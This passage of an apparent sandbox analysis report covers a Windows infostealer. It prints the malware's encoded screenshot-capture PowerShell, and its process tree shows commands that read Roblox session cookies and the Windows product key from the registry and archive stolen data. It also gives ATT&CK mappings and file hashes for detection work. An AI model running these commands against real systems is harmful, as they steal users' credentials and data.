IAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4960
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hm1fwslq\hm1fwslq.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1860
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7FEE.tmp" "c:\Users\Admin\AppData\Local\Temp\hm1fwslq\CSC26440C171EA141CA89B27A544596A2E4.TMP"
        6⤵
        
        PID:4908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5028
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI8922\rar.exe a -r -hp"bober228" "C:\Users\Admin\AppData\Local\Temp\oQxJP.zip" *"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4164
  - - C:\Users\Admin\AppData\Local\Temp\_MEI8922\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI8922\rar.exe a -r -hp"bober228" "C:\Users\Admin\AppData\Local\Temp\oQxJP.zip" *
      4⤵
      Executes dropped EXE
      PID:3860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3712
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:504
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1016
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2572
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2012

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6ecc5181b6e1191594ad2cd73f031ffb

SHA1
82237578f56ee3d741327ff09f504c70eb8d3ab3

SHA256
bb8735726a65e09f0af04837e37aeada304aaa6e7dde53c1f1ae9b3beba05d64

SHA512
7e1b3bbd39a45303d1f820993e28bdcf476c626d663b35b4c4f3fe3288c566661cd8846ca55fa731a2a987b64c5d6d8d0a819e97073ac76f5ffb998b9656492e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a10d2b9ad6e6f79bcc41644eb5dd1fab

SHA1
58302b2cafdb0aa99ff317ad2d70d91ed3e17b6a

SHA256
0e1f6fff707534ecf2c998ac5ca6860dc65f2264698cbff61bb9cd507696f623

SHA512
0b6b5c26cbf855877f858e0c59051034b09cdd1d1a19945e1572d7c4d432a5e299945f078aac829c14bdf2f29521e039001e190b22c063329340f675c5710c46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
05b3cd21c1ec02f04caba773186ee8d0

SHA1
39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

SHA256
911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

SHA512
e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6f5b98ce0ad06ebb5c2ec11ffec5fbb1

SHA1
82e1ea9056feba9ddcc85791cd3994f8607ada84

SHA256
2cda8a09bad4890dd11d84c6c38c71f07130bfce58ce09f308452e9a650bad93

SHA512
bf0a7c56e2d3edc7169772008576edab790033fdab0678dda8b952c85ceafbdcaf38a208f25b1a2a05c3444de0f98fec923868d4bf1aa4201dda0f6b5b3128e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7332074ae2b01262736b6fbd9e100dac

SHA1
22f992165065107cc9417fa4117240d84414a13c

SHA256
baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

SHA512
4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0203dd0a709d0fbb9267770b9d90b306

SHA1
1bf96fd7e94d8f7669ba489aa90497ec8b795f77

SHA256
2e6d22b7e7123b13ebbc59fd80ac8ed91446f09706f0a6c650e67d41f81c5090

SHA512
f9817fdcc5cc350ab30146825b52a9a61badc46a60e78a08fc3e2436f11cc8aa508ff6038a32e789692a396e01d9495c1a84b5f2f8afd19c60bba2b53429072b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
ccf1b703c8f1f34a2faf84a676e0ef0c

SHA1
46dc045aa7dcf8938c0352d4125e796d38c4b7a3

SHA256
789e5eaacf5284c772fd75aab4c445eadff4816410167eea41a185ffe35b36fa

SHA512
c53f8516e7e65f86a0cba52ba2a7aa5c9e0bee4285b6cae525a0c1202d04f779a20225a6b8f8e674daf1ab9b4b225b3ebb7cda7588b3ab062761b136eb86b24a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7FEE.tmp

Filesize
1KB

MD5
11ff702c84c6891d7d9f5ce0fb94a0c4

SHA1
674ae3ddfc4ec7b69677a4a81f89049235b1158f

SHA256
c8b6c5dcce7023e7a81f0a2a7581e33464d6dd46e165386d9f13086ccd9fef4f

SHA512
0469822d28b391bb2e597e98a907eacf8f91822e40e521b95435903320d705804db984b5500613b33ac266d20fbfc7c2d205031a07becd5c442ddcfdb599e3bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\_bz2.pyd

Filesize
48KB

MD5
6c57219d7f69eee439d7609ab9cc09e7

SHA1
52e8abbc41d34aa82388b54b20925ea2fcca2af8

SHA256
8e389c056a6cf8877ddf09a1ae53d1a1b1de71a32b437d992ec8195c3c8eda92

SHA512
801f5b3f15e25f3be3f7ece512ffa561c97d43fff465e8fcb8afc92a94fd0bd3ec57c3e4df775beb1a6357064fad2be2ab6345bb8fe8c9b00674ade546bf6bc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\_ctypes.pyd

Filesize
58KB

MD5
ee77573f4335614fc1dc05e8753d06d9

SHA1
9c78e7ce0b93af940749295ec6221f85c04d6b76

SHA256
20bc81c1b70f741375751ae7c4a177a409b141bfcd32b4267975c67fc1b11e87

SHA512
c87c9c68cb428c2305076545702e602c8119bb1c4b003fc077fc99a7b0f6ffd12cafdd7ff56dac5d150785adc920d92ea527067c8fec3c4a16737f11d23d4875

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\_decimal.pyd

Filesize
106KB

MD5
787f57b9a9a4dbc0660041d5542f73e2

SHA1
219f2cdb825c7857b071d5f4397f2dbf59f65b32

SHA256
d5646447436daca3f6a755e188ea15932ae6b5ba8f70d9c1de78f757d310d300

SHA512
cd06ea22530c25d038f8d9e3cc54d1fdbc421fb7987ab6ebc5b665ae86a73b39a131daef351420f1b1cb522002388c4180c8f92d93ea15460ccba9029cac7eef

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\_hashlib.pyd

Filesize
35KB

MD5
ff0042b6074efa09d687af4139b80cff

SHA1
e7483e6fa1aab9014b309028e2d31c9780d17f20

SHA256
e7ddac4d8f099bc5ebcb5f4a9de5def5be1fc62ecca614493e8866dc6c60b2ce

SHA512
0ff0178f7e681a7c138bfd32c1276cf2bd6fbeb734139b666f02a7f7c702a738abdbc9dddcf9ab991dead20ec3bf953a6c5436f8640e73bdd972c585937fa47a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\_lzma.pyd

Filesize
86KB

MD5
58b19076c6dfb4db6aa71b45293f271c

SHA1
c178edc7e787e1b485d87d9c4a3ccfeadeb7039e

SHA256
eff1a7fc55efe2119b1f6d4cf19c1ec51026b23611f8f9144d3ef354b67ff4d5

SHA512
f4305dcc2024a0a138d997e87d29824c088f71322021f926e61e3136a66bea92f80bce06345307935072a3e973255f9bbae18a90c94b80823fbc9a3a11d2b2f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\_queue.pyd

Filesize
25KB

MD5
e8f45b0a74ee548265566cbae85bfab8

SHA1
24492fcd4751c5d822029759dec1297ff31ae54a

SHA256
29e7801c52b5699d13a1d7b95fd173d4a45ab2791377ac1f3095d5edc8eba4bd

SHA512
5861a0606e2c2c2ebb3d010b4591e4f44e63b9dbfa59f8bb4ac1cda4fbfdcb969864601dee6b23d313fe8706819346cfbcd67373e372c7c23260b7277ee66fbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\_socket.pyd

Filesize
43KB

MD5
6ef6bcbb28b66b312ab7c30b1b78f3f3

SHA1
ca053c79ce7ea4b0ec60eff9ac3e8dd8ba251539

SHA256
203daa59e7bf083176cbfcc614e3bac09da83d1d09ef4fcd151f32b96499d4b2

SHA512
bec35443715f98ee42fda3697c2009c66d79b1170714ea6dedde51205b64a845194fe3786702e04c593059ee4ad4bbfa776fbc130a3400a4a995172675b3dfa9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\_sqlite3.pyd

Filesize
56KB

MD5
467bcfb26fe70f782ae3d7b1f371e839

SHA1
0f836eb86056b3c98d7baf025b37d0f5fe1a01a5

SHA256
6015c657b94e008e85f930d686634d2cafa884fd8943207ee759bc3a104c0f48

SHA512
19362aa94e6e336fd02f1f60fde9c032a45315f7973a1e597761ae3b49b916aecd89934b8ed33ee85fd53e150a708a4f8f2a25683fb15491daa8430c87a6511c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\_ssl.pyd

Filesize
65KB

MD5
96af7b0462af52a4d24b3f8bc0db6cd5

SHA1
2545bb454d0a972f1a7c688e2a5cd41ea81d3946

SHA256
23c08f69e5eaa3a4ab9cab287d7dc2a40aca048c8b3c89992cdb62d4de6eb01f

SHA512
2a8ed5a4143b3176e96d220f0255da32a139909dd49625ef839c2dfce46e45f11a0b7340eb60ad1f815a455333e45aece6e0d47a8b474419e3cbbbd46f01c062

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\base_library.zip

Filesize
1.4MB

MD5
6e706e4fa21d90109df6fce1b2595155

SHA1
5328dd26b361d36239facff79baca1bab426de68

SHA256
ce9b9f16ce0d9abdbac3307115d91eaf279c5152336ccbe8830151b41c802998

SHA512
c7e377e2854ad5b5c3fb23593817ad6345bf8a78d842ff2a45c3be135fad6bb27b67c5b6c01b26e7c1b1b12ea0814f4f6b6a522bbfa689b89fa50d3652799b34

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\blank.aes

Filesize
126KB

MD5
881a0adde6b35970e044ba1d4101f6b1

SHA1
3559051298744c093c5e5f1eb736f715cb53dbe0

SHA256
01f84eb86fd664ef9c1be703f8bb32e1d79950934935c7f33f65bb760482f8c1

SHA512
060023e6fa06d1c01ee5b7b8802ea330505012f415c025cc420e10e7a2a5e7ff76cddd44c5a4626b4a8fb9b945190b04969bb6f9f6ddaaf8163f639f4817add7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\blank.aes

Filesize
126KB

MD5
867bae9778e7c08b659c507f99780d25

SHA1
c6d2d66486bf4a7836c30ed5bbb17ed878178543

SHA256
bd8ac11d150fa566dca0bb579948f702372886da01a41dc0950d81b00a05364d

SHA512
b64693b1b7f88cf716ceec06527c56c951045b5b46f8421d071f49ae70f05608cbd688443b85e283452ee46dffb380cd9f400d8253db64f40471196d10831569

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\libcrypto-3.dll

Filesize
1.6MB

MD5
7f1b899d2015164ab951d04ebb91e9ac

SHA1
1223986c8a1cbb57ef1725175986e15018cc9eab

SHA256
41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986

SHA512
ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\libssl-3.dll

Filesize
222KB

MD5
264be59ff04e5dcd1d020f16aab3c8cb

SHA1
2d7e186c688b34fdb4c85a3fce0beff39b15d50e

SHA256
358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d

SHA512
9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\python311.dll

Filesize
1.6MB

MD5
b167b98fc5c89d65cb1fa8df31c5de13

SHA1
3a6597007f572ea09ed233d813462e80e14c5444

SHA256
28eda3ba32f5247c1a7bd2777ead982c24175765c4e2c1c28a0ef708079f2c76

SHA512
40a1f5cd2af7e7c28d4c8e327310ea1982478a9f6d300950c7372634df0d9ad840f3c64fe35cc01db4c798bd153b210c0a8472ae0898bebf8cf9c25dd3638de8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\select.pyd

Filesize
25KB

MD5
d76b7f6fd31844ed2e10278325725682

SHA1
6284b72273be14d544bb570ddf180c764cde2c06

SHA256
e46d0c71903db7d735cc040975bfc480dfea34b31b3e57b7dafa4c1f4058e969

SHA512
943ca5600f37cf094e08438e1f93b869f108abd556785e5d090051ed8cf003e85c1b380fc95f95bc871db59ffdd61099efa2e32d4354ca0cc70a789cf84abaa1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\sqlite3.dll

Filesize
630KB

MD5
73b763cedf2b9bdcb0691fb846894197

SHA1
bf2a9e88fba611c2e779ead1c7cfd10d7f4486b2

SHA256
e813695191510bf3f18073491dc0ea1b760bc22c334eefe0e97312810de5d8d5

SHA512
617cb2b6027a3aba009bb9946347c4e282dd50d38ca4764e819631feb3a7fd739fd458e67866f9f54b33b07645ca55229030860a4faab5f677866cfa4a1f7ee2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8922\unicodedata.pyd

Filesize
295KB

MD5
6873de332fbf126ddb53b4a2e33e35a5

SHA1
93748c90cd93fda83fcd5bb8187eeaf6b67a2d08

SHA256
f5631d92e9da39a6a1e50899d716eac323829d423a7f7fa21bd5061232564370

SHA512
0e03ba8c050aeadf88c390e5ea5e8e278f873885c970b67d5bc0675d782233a2925e753dae151c7af9976f64c42eba04a4dcec86204e983f6f6f2788a928401c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d1jhmqt3.llm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\hm1fwslq\hm1fwslq.dll

Filesize
4KB

MD5
a7cc9442dc3707374ea5d0b90b8be68d

SHA1
03632675168f3d9b68770d56d9503b190f1bcecd

SHA256
48b7e3b32a19ba831e0ec1d3559b0a1d4fde182348c16e6e9367dcc8b19a8531

SHA512
95c8350bfb54aed39d715942f825487e145288b29fe71bd1f4972ade5fbb2dc990adad0702b393d6471d2e112f3dfb8c6f344be14031dfa374294020dd83a9ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\oQxJP.zip

Filesize
412KB

MD5
db7486af2e19dd25091613703ccd2474

SHA1
f67c8e82fa4d6c4f8fae9d9452d51c57fdcb7938

SHA256
3aab8cd7397fcf35ed806c81bd5c9fa355101b2fcd7cbc3ad7494dad9de97582

SHA512
db799719affd1aeefc3b2f94ad3a1503899bd3e7d10971d899d1a036940760f4ad9c7efe04defe564111719fce2c483202cb15dcb0944195ada99f90ab70b5e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‍ \Credentials\Chrome\Chrome Cookies.txt

Filesize
257B

MD5
3f9acfaebf7210b682dc9c51c29e92e1

SHA1
2f7d42b5f6c43513f15fa2cb3d03f9476b5471cd

SHA256
2dd81817ede830f6604d4d71773b4167d18f8c2d553236a56792be99b51499d5

SHA512
8ea684cbb9ec031d2c36499ea80f8dbc9572926ab4e3fcf7fc53307ea05547c0226f07f438264eacc7d660e8e49dce7fc56e4cece47b4da3b4584cd9c24e6290

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‍ \Display (1).png

Filesize
414KB

MD5
859dbd5b96ba4f02fd1d30cd164f61e7

SHA1
3378e809e07c2ff14695ed373878fb61e9805b2a

SHA256
5cd025c1b2c04e569dd6eb691bf443d621f774cf610400584c74be20b1ff875b

SHA512
64d8243a7ae8cfa2c367d5b4b6e46625a39ae621af343fbe3c338e357a01eba1641efea2e0bf9d7c414d3933443cd887feef8870c5ebc7447c594186820e6695

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hm1fwslq\CSC26440C171EA141CA89B27A544596A2E4.TMP

Filesize
652B

MD5
50ee2f461391cecbe59f77519e6a7b03

SHA1
848f44a704b0f8bbccfd5515c2ec960a8c306462

SHA256
c065521ac68caffed1db90ee3578d88e0ad83a3eacaf125c2417eb81d6b90805

SHA512
759935d4f60c343de65369fa9702fb15dcf2ab30cd058fa1979d48841118c2e17390e79e594a960a1e382f99821ba1fd5211ff69550fb7d6f67bb93071fcb904

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hm1fwslq\hm1fwslq.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hm1fwslq\hm1fwslq.cmdline

Filesize
607B

MD5
aa24327f3a42edc93eaa61be3b197d7e

SHA1
6bf6e326fc250b777a2a3cf8496737f54800d094

SHA256
354256ba3c8a9b0c74e929946801e357d684446fdc11f3f0b0c56237be15651c

SHA512
7b0f3389a028158fc61786fd88a4b027f1e92fd2420ee58eeb0597df213ab64aff577722d5bc66d6437149228e2cc926a6e1f99dd174d50ad914690b366594a8

Download Submit
memory/3600-60-0x00007FF9A8CE0000-0x00007FF9A8E56000-memory.dmp

Filesize
1.5MB

Download
memory/3600-249-0x00007FF9AD0B0000-0x00007FF9AD0DD000-memory.dmp

Filesize
180KB

Download
memory/3600-84-0x00007FF9AD4C0000-0x00007FF9AD4D9000-memory.dmp

Filesize
100KB

Download
memory/3600-86-0x00007FF9AD080000-0x00007FF9AD0A3000-memory.dmp

Filesize
140KB

Download
memory/3600-244-0x00007FF9AC070000-0x00007FF9AC07D000-memory.dmp

Filesize
52KB

Download
memory/3600-76-0x00007FF9AD060000-0x00007FF9AD074000-memory.dmp

Filesize
80KB

Download
memory/3600-71-0x00007FF9B2310000-0x00007FF9B2334000-memory.dmp

Filesize
144KB

Download
memory/3600-246-0x00007FF997130000-0x00007FF997659000-memory.dmp

Filesize
5.2MB

Download
memory/3600-98-0x00007FF9A8CE0000-0x00007FF9A8E56000-memory.dmp

Filesize
1.5MB

Download
memory/3600-247-0x00007FF9B23B0000-0x00007FF9B23BF000-memory.dmp

Filesize
60KB

Download
memory/3600-70-0x00007FF9A5700000-0x00007FF9A5CF0000-memory.dmp

Filesize
5.9MB

Download
memory/3600-73-0x000001AD23150000-0x000001AD23679000-memory.dmp

Filesize
5.2MB

Download
memory/3600-78-0x00007FF9AD0B0000-0x00007FF9AD0DD000-memory.dmp

Filesize
180KB

Download
memory/3600-74-0x00007FF997130000-0x00007FF997659000-memory.dmp

Filesize
5.2MB

Download
memory/3600-72-0x00007FF9A85D0000-0x00007FF9A869D000-memory.dmp

Filesize
820KB

Download
memory/3600-248-0x00007FF9B2310000-0x00007FF9B2334000-memory.dmp

Filesize
144KB

Download
memory/3600-138-0x00007FF9AD3E0000-0x00007FF9AD3F9000-memory.dmp

Filesize
100KB

Download
memory/3600-79-0x00007FF9AC070000-0x00007FF9AC07D000-memory.dmp

Filesize
52KB

Download
memory/3600-66-0x00007FF9ABDA0000-0x00007FF9ABDD3000-memory.dmp

Filesize
204KB

Download
memory/3600-64-0x00007FF9B2370000-0x00007FF9B237D000-memory.dmp

Filesize
52KB

Download
memory/3600-58-0x00007FF9AD080000-0x00007FF9AD0A3000-memory.dmp

Filesize
140KB

Download
memory/3600-62-0x00007FF9AD3E0000-0x00007FF9AD3F9000-memory.dmp

Filesize
100KB

Download
memory/3600-245-0x00007FF9A84B0000-0x00007FF9A85CC000-memory.dmp

Filesize
1.1MB

Download
memory/3600-85-0x00007FF9A84B0000-0x00007FF9A85CC000-memory.dmp

Filesize
1.1MB

Download
memory/3600-209-0x000001AD23150000-0x000001AD23679000-memory.dmp

Filesize
5.2MB

Download
memory/3600-54-0x00007FF9AD0B0000-0x00007FF9AD0DD000-memory.dmp

Filesize
180KB

Download
memory/3600-208-0x00007FF9ABDA0000-0x00007FF9ABDD3000-memory.dmp

Filesize
204KB

Download
memory/3600-56-0x00007FF9AD4C0000-0x00007FF9AD4D9000-memory.dmp

Filesize
100KB

Download
memory/3600-31-0x00007FF9B2310000-0x00007FF9B2334000-memory.dmp

Filesize
144KB
